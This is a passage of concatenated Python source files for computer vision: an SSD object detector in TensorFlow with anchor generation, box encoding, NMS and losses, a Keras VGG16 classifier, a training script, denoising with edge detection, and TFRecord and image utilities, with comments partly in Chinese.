scope='conv4_2') net = self.conv2d(net, 512, [3, 3], scope='conv4_3') print(net) check_points['block4'] = net net = self.max_pool2d(net, pool_size=[2, 2], 
stride=[2, 2], scope='pool4') print('pool4', net) #b5 net = self.conv2d(net, filter=512, k_size=[3, 3], scope='conv5_1') net = self.conv2d(net, 512, [3, 3], scope='conv5_2') net = self.conv2d(net, 512, [3, 3], scope='conv5_3') print('conv5_3',net) net = self.max_pool2d(net, pool_size=[3, 3], stride=[1, 1], scope='pool5') print('pool5',net) #b6 net = self.conv2d(net,1024,[3,3],dilation=[6,6],scope='conv6') print('conv6',net) #b7 net = self.conv2d(net,1024,[1,1],scope='conv7') print('conv7',net) check_points['block7'] = net #b8],scope='conv8_1x1') net = self.conv2d(net, 256, [1, 1], scope='conv8_1x1') print('conv8_3',net) net = self.conv2d(self.pad2d(net, 1), 512, [3, 3], [2, 2], scope='conv8_3x3', padding='valid') check_points['block8'] = net #b9 net = self.conv2d(net, 128, [1, 1], scope='conv9_1x1') net = self.conv2d(self.pad2d(net,1), 256, [3, 3], [2, 2], scope='conv9_3x3', padding='valid') check_points['block9'] = net #b10 net = self.conv2d(net, 128, [1, 1], scope='conv10_1x1') net = self.conv2d(net, 256, [3, 3], scope='conv10_3x3', padding='valid') check_points['block10'] = net #b11 net = self.conv2d(net, 128, [1, 1], scope='conv11_1x1') net = self.conv2d(net, 256, [3, 3], scope='conv11_3x3', padding='valid') check_points['block11'] = net for i,j in enumerate(self.feature_layers): loc,cls = self.ssd_prediction( x = check_points[j], num_classes = self.num_classes, box_num = self.boxes_len[i], isL2norm = self.isL2norm[i], scope = j + '_box' ) logit.append(cls) predictions.append(tf.nn.softmax(cls)) locations.append(loc) if x_re: return locations, predictions,x else: return locations,predictions,logit ########### ssd网络架构部分结束 ########## 先验框部分开始 #先验框生成 def ssd_anchor_layer(self,img_size,feature_map_size,anchor_size,anchor_ratio,anchor_step,box_num,offset=0.5): y,x = np.mgrid[0:feature_map_size[0],0:feature_map_size[1]] y = (y.astype(np.float32) + offset) * anchor_step /img_size[0] x = (x.astype(np.float32) + offset) * anchor_step /img_size[1] y = 
np.expand_dims(y,axis=-1) x = np.expand_dims(x,axis=-1) #计算两个长宽比为1的h、w h = np.zeros((box_num,),np.float32) w = np.zeros((box_num,),np.float32) h[0] = anchor_size[0] /img_size[0] w[0] = anchor_size[0] /img_size[0] h[1] = (anchor_size[0] * anchor_size[1]) ** 0.5 / img_size[0] w[1] = (anchor_size[0] * anchor_size[1]) ** 0.5 / img_size[1] for i,j in enumerate(anchor_ratio): h[i + 2] = anchor_size[0] / img_size[0] / (j ** 0.5) w[i + 2] = anchor_size[0] / img_size[1] * (j ** 0.5) return y,x,h,w #解码网络 def ssd_decode(self,location,box,prior_scaling): y_a, x_a, h_a, w_a = box cx = location[:, :, :, :, 0] * w_a * prior_scaling[0] + x_a ######################### cy = location[:, :, :, :, 1] * h_a * prior_scaling[1] + y_a w = w_a * tf.exp(location[:, :, :, :, 2] * prior_scaling[2]) h = h_a * tf.exp(location[:, :, :, :, 3] * prior_scaling[3]) bboxes = tf.stack([cy - h / 2.0, cx - w / 2.0, cy + h / 2.0, cx + w / 2.0], axis=-1) return bboxes #先验框筛选 def choose_anchor_boxes(self, predictions, anchor_box, n_box): anchor_box = tf.reshape(anchor_box, [n_box, 4]) prediction = tf.reshape(predictions, [n_box, 21]) prediction = prediction[:, 1:] classes = tf.argmax(prediction, axis=1) + 1 scores = tf.reduce_max(prediction, axis=1) filter_mask = scores > self.threshold classes = tf.boolean_mask(classes, filter_mask) scores = tf.boolean_mask(scores, filter_mask) anchor_box = tf.boolean_mask(anchor_box, filter_mask) return classes, scores, anchor_box ########## 先验框部分结束 ######### 训练部分开始 def bboxes_sort(self,classes, scores, bboxes, top_k=400): idxes = np.argsort(-scores) classes = classes[idxes][:top_k] scores = scores[idxes][:top_k] bboxes = bboxes[idxes][:top_k] return classes, scores, bboxes # 计算IOU def bboxes_iou(self,bboxes1, bboxes2): bboxes1 = np.transpose(bboxes1) bboxes2 = np.transpose(bboxes2) # 计算两个box的交集:交集左上角的点取两个box的max,交集右下角的点取两个box的min int_ymin = np.maximum(bboxes1[0], bboxes2[0]) int_xmin = np.maximum(bboxes1[1], bboxes2[1]) int_ymax = np.minimum(bboxes1[2], bboxes2[2]) 
int_xmax = np.minimum(bboxes1[3], bboxes2[3]) # 计算两个box交集的wh:如果两个box没有交集,那么wh为0(按照计算方式wh为负数,跟0比较取最大值) int_h = np.maximum(int_ymax - int_ymin, 0.) int_w = np.maximum(int_xmax - int_xmin, 0.) # 计算IOU int_vol = int_h * int_w # 交集面积 vol1 = (bboxes1[2] - bboxes1[0]) * (bboxes1[3] - bboxes1[1]) # bboxes1面积 vol2 = (bboxes2[2] - bboxes2[0]) * (bboxes2[3] - bboxes2[1]) # bboxes2面积 iou = int_vol / (vol1 + vol2 - int_vol) # IOU=交集/并集 return iou # NMS def bboxes_nms(self,classes, scores, bboxes, nms_threshold=0.5): keep_bboxes = np.ones(scores.shape, dtype=np.bool) for i in range(scores.size - 1): if keep_bboxes[i]: overlap = self.bboxes_iou(bboxes[i], bboxes[(i + 1):]) keep_overlap = np.logical_or(overlap < nms_threshold, classes[(i + 1):] != classes[i]) keep_bboxes[(i + 1):] = np.logical_and(keep_bboxes[(i + 1):], keep_overlap) idxes = np.where(keep_bboxes) return classes[idxes], scores[idxes], bboxes[idxes] ######## 训练部分结束 def handle_img(self,img_path): means = np.array((123., 117., 104.)) self.img = cv2.imread(img_path) # img = self.img # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) - means # img = cv2.resize(img,self.img_size) # img = np.expand_dims(img,axis=0) img = np.expand_dims(cv2.resize(cv2.cvtColor(self.img, cv2.COLOR_BGR2RGB) - means,self.img_size),axis=0) return img def draw_rectangle(self,img, classes, scores, bboxes, colors, thickness=2): shape = img.shape for i in range(bboxes.shape[0]): bbox = bboxes[i] # color = colors[classes[i]] p1 = (int(bbox[0] * shape[0]), int(bbox[1] * shape[1])) p2 = (int(bbox[2] * shape[0]), int(bbox[3] * shape[1])) cv2.rectangle(img, p1[::-1], p2[::-1], colors[1], 1) # Draw text... 
s = '%s/%.3f' % (self.classes[classes[i] - 1], scores[i]) p1 = (p1[0] - 5, p1[1]) cv2.putText(img, s, p1[::-1], cv2.FONT_HERSHEY_DUPLEX, 0.5, colors[1], 1) # cv2.namedWindow("ssd", 0); # cv2.resizeWindow("ssd", 640, 480); cv2.imshow('ssd', img) cv2.waitKey(0) cv2.destroyAllWindows() def run_this(self,locations,predictions): layers_anchors = [] classes_list = [] scores_list = [] bboxes_list = [] for i, s in enumerate(self.feature_map_size): anchor_bboxes = self.ssd_anchor_layer(self.img_size, s, self.anchor_sizes[i], self.anchor_ratios[i], self.anchor_steps[i], self.boxes_len[i]) layers_anchors.append(anchor_bboxes) for i in range(len(predictions)): d_box = self.ssd_decode(locations[i], layers_anchors[i], self.prior_scaling) cls, sco, box = self.choose_anchor_boxes(predictions[i], d_box, self.n_boxes[i]) classes_list.append(cls) scores_list.append(sco) bboxes_list.append(box) classes = tf.concat(classes_list, axis=0) scores = tf.concat(scores_list, axis=0) bboxes = tf.concat(bboxes_list, axis=0) return classes,scores,bboxes def bboxes_encode(self, labels, bboxes, anchors, scope=None): target_labels, target_localizations, target_scores = tf_ssd_bboxes_encode( labels, bboxes, anchors, self.num_classes, prior_scaling=self.prior_scaling, scope=scope) return target_labels, target_localizations, target_scores def smooth_L1(self,x): absx = tf.abs(x) minx = tf.minimum(absx, 1) r = 0.5 * ((absx - 1) * minx + absx) return r def ssd_losses(self,logits, localisations, # 预测类别,位置 gclasses, glocalisations, gscores, # ground truth类别,位置,得分 match_threshold=0.5, negative_ratio=3., alpha=1., scope=None): ''' n_neg就是负样本的数量,negative_ratio正负样本比列,默认就是3, 后面的第一个取最大,我觉得是保证至少有负样本, max_neg_entries这个就是负样本的数量,n_neg = tf.minimum(n_neg, max_neg_entries),这个比较很好理解,万一 你总样本比你三倍正样本少,所以需要选择小的,所以这个地方保证足够的负样本,nmask表示我们所选取的负样本, tf.nn.top_k,这个是选取前k = neg个负例,因为取了负号,表示选择的交并比最小的k个,minval就是选择负例里面交并比 最大的,nmask就是把我们选择的负样例设为整数,就是提取出我们选择的,tf.logical_and就是同时为真,首先。需要是 
负例,其次值需要大于minval,因为取了负数,所以nmask就是我们所选择的负例,fnmask就是就是我们选取的负样本只是 数据类型变了,由bool变为了浮点型,(dtype默认是浮点型) ''' with tf.name_scope(scope, 'ssd_losses'): # 提取类别数和batch_size # tensor_shape函数可以取代 num_classes = int(logits[0].shape[-1]) batch_size = int(logits[0].shape[0]) print('num_cl,batch',num_classes,batch_size) # Flatten out all vectors! flogits = [] fgclasses = [] fgscores = [] flocalisations = [] fglocalisations = [] for i in range(len(logits)): # 按照图片循环 flogits.append(tf.reshape(logits[i], [-1, num_classes])) fgclasses.append(tf.reshape(gclasses[i], [-1])) fgscores.append(tf.reshape(gscores[i], [-1])) flocalisations.append(tf.reshape(localisations[i], [-1, 4])) fglocalisations.append(tf.reshape(glocalisations[i], [-1, 4])) # And concat the crap! # logits (none,38,38,4,21) logits = tf.concat(flogits, axis=0) # 全部的搜索框,对应的21类别的输出 gclasses = tf.concat(fgclasses, axis=0) # 全部的搜索框,真实的类别数字 gscores = tf.concat(fgscores, axis=0) # 全部的搜索框,和真实框的IOU localisations = tf.concat(flocalisations, axis=0) glocalisations = tf.concat(fglocalisations, axis=0) dtype = logits.dtype pmask = gscores > match_threshold # (全部搜索框数目, 21),类别搜索框和真实框IOU大于阈值 fpmask = tf.cast(pmask, dtype) # 浮点型前景掩码(前景假定为含有对象的IOU足够的搜索框标号) n_positives = tf.reduce_sum(fpmask) # tp总数 # Hard negative mining... no_classes = tf.cast(pmask, tf.int32) predictions = tf.nn.softmax(logits) # 此时每一行的21个数转化为概率 nmask = tf.logical_and(tf.logical_not(pmask), gscores > -0.5) # IOU达不到阈值的类别搜索框位置记1 print(nmask) fnmask = tf.cast(nmask, dtype) nvalues = tf.where(nmask, predictions[:, 0], # 框内无物体标记为背景预测概率 1. - fnmask) # 框内有物体位置标记为1 nvalues_flat = tf.reshape(nvalues, [-1]) # Number of negative entries to select. # 在nmask中剔除n_neg个最不可能背景点(对应的class0概率最低) max_neg_entries = tf.cast(tf.reduce_sum(fnmask), tf.int32) # 3 × tpmask n_negs = tf.cast(negative_ratio * n_positives, tf.int32) n_neg = tf.minimum(n_negs, max_neg_entries) val, idxes = tf.nn.top_k(-nvalues_flat, k=n_neg) # 最不可能为背景的n_neg个点 max_hard_pred = -val[-1] # Final negative mask. 
nmask = tf.logical_and(nmask, nvalues < max_hard_pred) # 不是前景,又最不像背景的n_neg个点 fnmask = tf.cast(nmask, dtype) # Add cross-entropy loss. with tf.name_scope('cross_entropy_pos'): loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=gclasses) # 0-20 loss_pos = tf.div(tf.reduce_sum(loss * fpmask), batch_size,name='value') with tf.name_scope('cross_entropy_neg'): loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=no_classes) # {0,1} loss_neg = tf.div(tf.reduce_sum(loss * fnmask), batch_size,name='value') # Add localization loss: smooth L1, L2, ... with tf.name_scope('localization'): # Weights Tensor: positive mask + random negative. weights = tf.expand_dims(alpha * fpmask, axis=-1) # alpha * fpm = (n,) loss = self.smooth_L1(localisations - glocalisations) #(m,n) loss_loc = tf.div(tf.reduce_sum(loss * weights), batch_size,name='value') return loss_pos,loss_neg,loss_loc def tf_ssd_bboxes_encode(labels, #编码:真实值和ANCHOR BOX 、编码 bboxes, anchors, num_classes, prior_scaling=(0.1, 0.1, 0.2, 0.2), dtype=tf.float32, scope='ssd_bboxes_encode'): with tf.name_scope(scope): target_labels = [] target_localizations = [] target_scores = [] for i, anchors_layer in enumerate(anchors): with tf.name_scope('bboxes_encode_block_%i' % i): # (m,m,k),xywh(m,m,4k),(m,m,k) t_labels, t_loc, t_scores = tf_ssd_bboxes_encode_layer(labels, bboxes, anchors_layer, num_classes) target_labels.append(t_labels) target_localizations.append(t_loc) target_scores.append(t_scores) return target_labels, target_localizations, target_scores def tf_ssd_bboxes_encode_layer(labels, # (n,) bboxes, # (n, 4) anchors_layer, # y(m, m, 1), x(m, m, 1), h(k,), w(k,) num_classes, prior_scaling=(0.1, 0.1, 0.2, 0.2), dtype=tf.float32): yref, xref, href, wref = anchors_layer ymin = yref - href / 2. xmin = xref - wref / 2. ymax = yref + href / 2. xmax = xref + wref / 2. 
vol_anchors = (xmax - xmin) * (ymax - ymin) shape = (yref.shape[0], yref.shape[1], href.size) feat_labels = tf.zeros(shape, dtype=tf.int64) # (m, m, k) feat_scores = tf.zeros(shape, dtype=dtype) feat_ymin = tf.zeros(shape, dtype=dtype) feat_xmin = tf.zeros(shape, dtype=dtype) feat_ymax = tf.ones(shape, dtype=dtype) feat_xmax = tf.ones(shape, dtype=dtype) def jaccard_with_anchors(bbox): int_ymin = tf.maximum(ymin, bbox[0]) # (m, m, k) int_xmin = tf.maximum(xmin, bbox[1]) int_ymax = tf.minimum(ymax, bbox[2]) int_xmax = tf.minimum(xmax, bbox[3]) h = tf.maximum(int_ymax - int_ymin, 0.) w = tf.maximum(int_xmax - int_xmin, 0.) # Volumes. # 处理搜索框和bbox之间的联系 inter_vol = h * w # 交集面积 union_vol = vol_anchors - inter_vol \ + (bbox[2] - bbox[0]) * (bbox[3] - bbox[1]) # 并集面积 jaccard = tf.div(inter_vol, union_vol) # 交集/并集,即IOU return jaccard # (m, m, k) def condition(i,feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax): r = tf.less(i, tf.shape(labels)) return r[0] def body(i, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax): """ 更新功能标签、分数和bbox。 -JacCard>0.5时赋值; """ label = labels[i] # 当前图片上第i个对象的标签 bbox = bboxes[i] # 当前图片上第i个对象的真实框bbox jaccard = jaccard_with_anchors(bbox) # 当前对象的bbox和当前层的搜索网格IOU mask = tf.greater(jaccard, feat_scores) # 掩码矩阵,IOU大于历史得分的为True mask = tf.logical_and(mask, feat_scores > -0.5) imask = tf.cast(mask, tf.int64) #[1,0,1,1,0] fmask = tf.cast(mask, dtype) #[1.,0.,1.,0. ... ] # Update values using mask. 
# 保证feat_labels存储对应位置得分最大对象标签,feat_scores存储那个得分 # (m, m, k) × 当前类别 + (1 - (m, m, k)) × (m, m, k) # 更新label记录,此时的imask已经保证了True位置当前对像得分高于之前的对象得分,其他位置值不变 feat_labels = imask * label + (1 - imask) * feat_labels # 更新score记录,mask为True使用本类别IOU,否则不变 feat_scores = tf.where(mask, jaccard, feat_scores) # 下面四个矩阵存储对应label的真实框坐标 # (m, m, k) × 当前框坐标scalar + (1 - (m, m, k)) × (m, m, k) feat_ymin = fmask * bbox[0] + (1 - fmask) * feat_ymin feat_xmin = fmask * bbox[1] + (1 - fmask) * feat_xmin feat_ymax = fmask * bbox[2] + (1 - fmask) * feat_ymax feat_xmax = fmask * bbox[3] + (1 - fmask) * feat_xmax return [i + 1, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax] i = 0 (i, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax) = tf.while_loop(condition, body, [i, feat_labels, feat_scores, feat_ymin, feat_xmin, feat_ymax, feat_xmax]) # Transform to center / size. # 这里的y、x、h、w指的是对应位置所属真实框的相关属性 feat_cy = (feat_ymax + feat_ymin) / 2. feat_cx = (feat_xmax + feat_xmin) / 2. feat_h = feat_ymax - feat_ymin feat_w = feat_xmax - feat_xmin # Encode features. 
# ((m, m, k) - (m, m, 1)) / (k,) * 10 # 以搜索网格中心点为参考,真实框中心的偏移,单位长度为网格hw feat_cy = (feat_cy - yref) / href / prior_scaling[0] feat_cx = (feat_cx - xref) / wref / prior_scaling[1] # log((m, m, k) / (m, m, 1)) * 5 # 真实框宽高/搜索网格宽高,取对 feat_h = tf.log(feat_h / href) / prior_scaling[2] feat_w = tf.log(feat_w / wref) / prior_scaling[3] # Use SSD ordering: x / y / w / h instead of ours.(m, m, k, 4) feat_localizations = tf.stack([feat_cx, feat_cy, feat_w, feat_h], axis=-1) return feat_labels, feat_localizations, feat_scores ''' 只要修改 img = sd.handle_img('tetst.jpg') 这一行代码就好啦,把你想预测的图片放进去 ''' if __name__ == '__main__': start_time = datetime.datetime.now() sd = ssd() locations, predictions, x = sd.set_net() classes, scores, bboxes = sd.run_this(locations, predictions) sess = tf.Session() ckpt_filename = '../../Nn/ssd_vgg_300_weights.ckpt' sess.run(tf.global_variables_initializer()) saver = tf.train.Saver() saver.restore(sess, ckpt_filename) img = sd.handle_img('../road.jpg') rclasses, rscores, rbboxes = sess.run([classes, scores, bboxes], feed_dict={x: img}) rclasses, rscores, rbboxes = sd.bboxes_sort(rclasses, rscores, rbboxes) rclasses, rscores, rbboxes = sd.bboxes_nms(rclasses, rscores, rbboxes) print(datetime.datetime.now() - start_time) sd.draw_rectangle(sd.img,rclasses,rscores,rbboxes,[[0,0,255],[255,0,0]]) <file_sep>from keras.models import Sequential from keras.layers.core import Flatten, Dropout, Dense from keras.layers.convolutional import Convolution2D, MaxPooling2D import cv2 import numpy as np import warnings import tensorflow as tf class vgg(object): def __init__(self, model_weights): self.model_weights = model_weights self.model = Sequential() self.mean = [103, 93, 116, 79, 123.68] def load_img(self, imgurl): self.img = cv2.imread(imgurl) im = cv2.resize(self.img, (224, 224)).astype(np.floar32) im[:, :, 0] -= self.mean[0] im[:, :, 1] -= self.mean[1] im[:, :, 2] -= self.mean[2] im = np.expand_dims(im, axis=0) # [barch,width,height,channels] return im # Conv卷积操作 
Max池化操作 def model_add(self, filter=None, isConv=False, isMax=False, input_shape=None): if isConv: if input_shape: self.model.add( Convolution2D(filters=filter, strides=(1, 1), input_shape=input_shape, kernel_size=(3, 3), activation='relu', padding='same')) else: self.model.add(Convolution2D(filters=filter, strides=(1, 1), activation='relu', padding='same', kernel_size=(3, 3))) if isMax: self.model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2))) # 网络结构 def nn(self): self.model_add(filter=64, isConv=True, input_shape=(224, 224, 3)) self.model_add(64, isConv=True) self.model_add(isMax=True) self.model_add(128, isConv=True) self.model_add(128, isConv=True) self.model_add(isMax=True) self.model_add(256, isConv=True) self.model_add(256, isConv=True) self.model_add(256, isConv=True) self.model_add(isMax=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(isMax=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(isMax=True) self.model.add(Flatten) self.model.add(Dense(4096,activation='relu')) self.model.add(Dropout(.5)) self.model.add(Dense(1000,activation='softmax')) self.model.load_weights('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5') #预测 def pred(self,imgurl): self.nn() cls = open('model/VGG16/classes.txt') lines = cls.readlines() cls.close() img = self.load_img(imgurl) pre = np.argmax(self.model.predict(img)) self.show_img(lines[pre]) def show_img(self,text): cv2.putText(self.img,text,(50,50),cv2.FONT_HERSHEY_SIMPLEX,.5,(0,0,255),1) cv2.imshow('img',self.img) cv2.waitKey(0) cv2.destroyAllWindows() if __name__ == '__name__': net = vgg(model_weights='vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5') net.pred('test.jpg')<file_sep>import tensorflow as tf import numpy as np from SSD import ssd import SSD.tfr_data_process import SSD.preprocess_img_tf import SSD.util_tf import matplotlib.pyplot as plt slim = tf.contrib.slim 
max_steps = 10000 batch_size = 5 num_epochs_per_decay = 2.0 num_samples_per_epoch = 17125 sd = ssd() # global_step = tf.train.create_global_step() #1----------------->获取所有anchor_boxes layers_anchors = [] for i, s in enumerate(sd.feature_map_size): anchor_bboxes = sd.ssd_anchor_layer(sd.img_size, s, sd.anchor_sizes[i], sd.anchor_ratios[i], sd.anchor_steps[i], sd.boxes_len[i]) layers_anchors.append(anchor_bboxes) # 2-------------->数据加载 dataset = SSD.tfr_data_process.get_split('../TFR_Data', 'voc2012_*.tfrecord', num_classes=21, num_samples=num_samples_per_epoch) image, glabels, ggggbboxes = SSD.tfr_data_process.tfr_read(dataset) image, glabels, gbboxes = \ SSD.preprocess_img_tf.preprocess_image(image, glabels, ggggbboxes, out_shape=(300, 300)) # 2.1 resize # image = SSD.util_tf.resize_image(image,size=(300, 300)) # #2.2 white # image = SSD.util_tf.tf_image_whitened(image) #3----------------> 编码网络 target_labels,target_localizations,target_scores = sd.bboxes_encode(glabels, gbboxes,layers_anchors) batch_shape = [1] + [len(layers_anchors)] * 3 #[1,6,6,6] r = tf.train.batch( # 图片,中心点类别,真实框坐标,得分 SSD.util_tf.reshape_list([image, target_labels, target_localizations, target_scores]), batch_size=batch_size, num_threads=4, capacity=5 * batch_size) batch_queue = slim.prefetch_queue.prefetch_queue( r, capacity=2) b_image, b_gclasses, b_glocalisations, b_gscores = SSD.util_tf.reshape_list(batch_queue.dequeue(), batch_shape) #4----------------------->经过网络 pred_locations,pred_predictions,logit = sd.set_net(x = b_image) cls_pos_loss,cls_neg_loss,loca_loss = sd.ssd_losses(logit,pred_locations, b_gclasses,b_glocalisations,b_gscores) total_loss = tf.reduce_sum([cls_neg_loss,cls_pos_loss,loca_loss]) # global_step = tf.Variable(0) ''' 这里learning_rate 采用指数衰减法, decayed_learning_rate=learining_rate*decay_rate^(global_step/decay_steps) learning_rate为事先设定的初始学习率; decay_rate为衰减系数; decay_steps为衰减速度。 global_step:全局步数 而tf.train.exponential_decay函数则可以通过staircase(默认值为False,当为True时, 
(global_step/decay_steps)则被转化为整数) ,选择不同的衰减方式。 ''' global_step = tf.train.create_global_step() decay_steps = int(num_samples_per_epoch / batch_size * num_epochs_per_decay) learning_rate = tf.train.exponential_decay(0.01, global_step, decay_steps, 0.94, # learning_rate_decay_factor, staircase=True, name='exponential_decay_learning_rate') optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(total_loss,global_step=global_step) init_op = tf.initialize_all_variables() print('开始训练') with tf.Session() as sess: loss_array = [] coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(sess=sess, coord=coord) sess.run(init_op) # print('batch_queue', sess.run(batch_queue)) for step in range(max_steps): # sess.run(optimizer) loss_value = sess.run(total_loss) loss_array.append(loss_value) print("第%d次的误差为:%f" % (step, loss_value)) # print('no_',sess.run(no_classes)) if step == 300: plt.plot([i for i in range(len(loss_array))], loss_array) plt.show() coord.request_stop() coord.join(threads) <file_sep>import cv2 import numpy as np import PIL ######################################NLM def psnr(A, B): return 10 * np.log(255 * 255.0 / (((A.astype(np.float) - B) ** 2).mean())) / np.log(10) def double2uint8(I, ratio=1.0): return np.clip(np.round(I * ratio), 0, 255).astype(np.uint8) def make_kernel(f): kernel = np.zeros((2 * f + 1, 2 * f + 1)) for d in range(1, f + 1): kernel[f - d:f + d + 1, f - d:f + d + 1] += (1.0 / ((2 * d + 1) ** 2)) return kernel / kernel.sum() def NLmeansfilter(I, h_=10, templateWindowSize=5, searchWindowSize=11): f = templateWindowSize / 2 t = searchWindowSize / 2 height, width = I.shape[:2] padLength = t + f I2 = np.pad(I, padLength, 'symmetric') kernel = make_kernel(f) h = (h_ ** 2) I_ = I2[padLength - f:padLength + f + height, padLength - f:padLength + f + width] average = np.zeros(I.shape) sweight = np.zeros(I.shape) wmax = np.zeros(I.shape) for i in range(-t, t + 1): for j in range(-t, t + 1): if i == 0 and j == 0: continue I2_ = 
I2[padLength + i - f:padLength + i + f + height, padLength + j - f:padLength + j + f + width] w = np.exp(-cv2.filter2D((I2_ - I_) ** 2, -1, kernel) / h)[f:f + height, f:f + width] sweight += w wmax = np.maximum(wmax, w) average += (w * I2_[f:f + height, f:f + width]) return (average + wmax * I) / (sweight + wmax) def NLM(I): sigma = 20.0 I1 = double2uint8(I + np.random.randn(*I.shape) * sigma) #print(u'噪声图像PSNR', psnr(I, I1)) R1 = cv2.medianBlur(I1, 5) #print(u'中值滤波PSNR', psnr(I, R1)) R2 = cv2.fastNlMeansDenoising(I1, None, sigma, 5, 11) #print(u'opencv的NLM算法', psnr(I, R2)) #R3 = double2uint8(NLmeansfilter(I1.astype(np.float), sigma, 5, 11)) #print(u'NLM PSNR', psnr(I, R3)) return R2 ######################################NLM ######################################Sobel def Sobel(I): source = I #cv2.imshow('source', source) # source=source.astype(np.float32) # sobel_x:发现垂直边缘 sobel_x = cv2.Sobel(source, cv2.CV_64F, 1, 0) # sobel_y:发现水平边缘 sobel_y = cv2.Sobel(source, cv2.CV_64F, 0, 1) # sobel_x = np.uint8(np.absolute(sobel_x)) # sobel_y = np.uint8(np.absolute(sobel_y)) np.set_printoptions(threshold=np.inf) # print(sobel_x) # sobelCombined = cv2.bitwise_or(sobel_x, sobel_y) # 按位或 sum = double2uint8(np.sqrt(np.power(sobel_x, 2) + np.power(sobel_y, 2))) return sum ######################################Sobel ######################################Main if __name__ == '__main__': I = cv2.imread('4.tiff', 0) J = cv2.threshold(I,127,255,cv2.THRESH_BINARY) #cv2.adaptiveThreshold() cv2.imshow('1',I) Image('2', J) n = NLM(I) s = Sobel(n) img_add = np.zeros(shape=(I.shape[0], I.shape[1]), dtype=np.float64) img_add += n img_add += s img_add = double2uint8(img_add) cv2.imshow('img', img_add) cv2.waitKey() ######################################Main <file_sep>import os import tensorflow as tf slim = tf.contrib.slim def get_split(tfr_path, tfr_pattren, num_classes=21, num_samples=17125): # ===============TFR文件名匹配模板=============== tfr_pattren = os.path.join(tfr_path, tfr_pattren) # 
=========阅读器========= reader = tf.TFRecordReader # ===================解码器=================== keys_to_features = { # 解码TFR文件方式 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='jpeg'), 'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/label': tf.VarLenFeature(dtype=tf.int64), } items_to_handlers = { # 解码二进制数据 # 图像解码设置蛮有意思的 'image': slim.tfexample_decoder.Image('image/encoded', 'image/format'), 'object/bbox': slim.tfexample_decoder.BoundingBox( ['ymin', 'xmin', 'ymax', 'xmax'], 'image/object/bbox/'), 'object/label': slim.tfexample_decoder.Tensor('image/object/bbox/label'), } decoder = slim.tfexample_decoder.TFExampleDecoder(keys_to_features, items_to_handlers) # =======描述字段======= items_to_descriptions = { 'image': 'A color image of varying height and width.', 'shape': 'Shape of the image', 'object/bbox': 'A list of bounding boxes, one per each object.', 'object/label': 'A list of labels, one per each object.', } return slim.dataset.Dataset( data_sources=tfr_pattren, # TFR文件名 reader=reader, # 阅读器 decoder=decoder, # 解码器 num_samples=num_samples, # 数目 items_to_descriptions=items_to_descriptions, # decoder条目描述字段 num_classes=num_classes, # 类别数 labels_to_names=None # 字典{图片:类别,……} ) def tfr_read(dataset): # 涉及队列操作,本部使用CPU设备 provider = slim.dataset_data_provider.DatasetDataProvider( dataset, # DatasetDataProvider 需要 slim.dataset.Dataset 做参数 num_readers=2, common_queue_capacity=20 * 5, common_queue_min=10 * 5, shuffle=True) image, glabels, gbboxes = provider.get(['image', 'object/label', 'object/bbox']) return image, glabels, gbboxes <file_sep>import tensorflow as tf from tensorflow.python.ops import control_flow_ops import numpy as np slim = tf.contrib.slim _R_MEAN = 123.68 
_G_MEAN = 116.78 _B_MEAN = 103.94 _RESIZE_SIDE_MIN = 256 _RESIZE_SIDE_MAX = 512 def tensor_shape(x, rank=3): """Returns the dimensions of a tensor. """ if x.get_shape().is_fully_defined(): return x.get_shape().as_list() else: # get_shape返回值,with_rank相当于断言assert,是否rank为指定值 static_shape = x.get_shape().with_rank(rank).as_list() # tf.shape返回张量,其中num解释为"The length of the dimension `axis`.",axis默认为0 dynamic_shape = tf.unstack(tf.shape(x), num=rank) # list,有定义的给数字,没有的给tensor return [s if s is not None else d for s, d in zip(static_shape, dynamic_shape)] def abs_smooth(x): #l1平滑误差 """Smoothed absolute function. Useful to compute an L1 smooth error. Define as: x^2 / 2 if abs(x) < 1 abs(x) - 0.5 if abs(x) > 1 We use here a differentiable definition using min(x) and abs(x). Clearly not optimal, but good enough for our purpose! """ absx = tf.abs(x) minx = tf.minimum(absx, 1) r = 0.5 * ((absx - 1) * minx + absx) return r def reshape_list(l, shape=None): """Reshape list of (list): 1D to 2D or the other way around. Args: l: List or List of list. shape: 1D or 2D shape. Return Reshaped list. """ r = [] if shape is None: # Flatten everything. for a in l: if isinstance(a, (list, tuple)): r = r + list(a) else: r.append(a) else: # Reshape to list of list. i = 0 for s in shape: if s == 1: r.append(l[i]) else: r.append(l[i:i + s]) i += s return r def resize_image(image, size, method=tf.image.ResizeMethod.BILINEAR, align_corners=False): """Resize an image and bounding boxes. """ # Resize image. with tf.name_scope('resize_image'): height, width, channels = tensor_shape(image) image = tf.expand_dims(image, 0) image = tf.image.resize_images(image, size, method, align_corners) image = tf.reshape(image, tf.stack([size[0], size[1], channels])) return image def _check3dimage(image, require_static=True): """Assert that we are working with properly shaped image. 
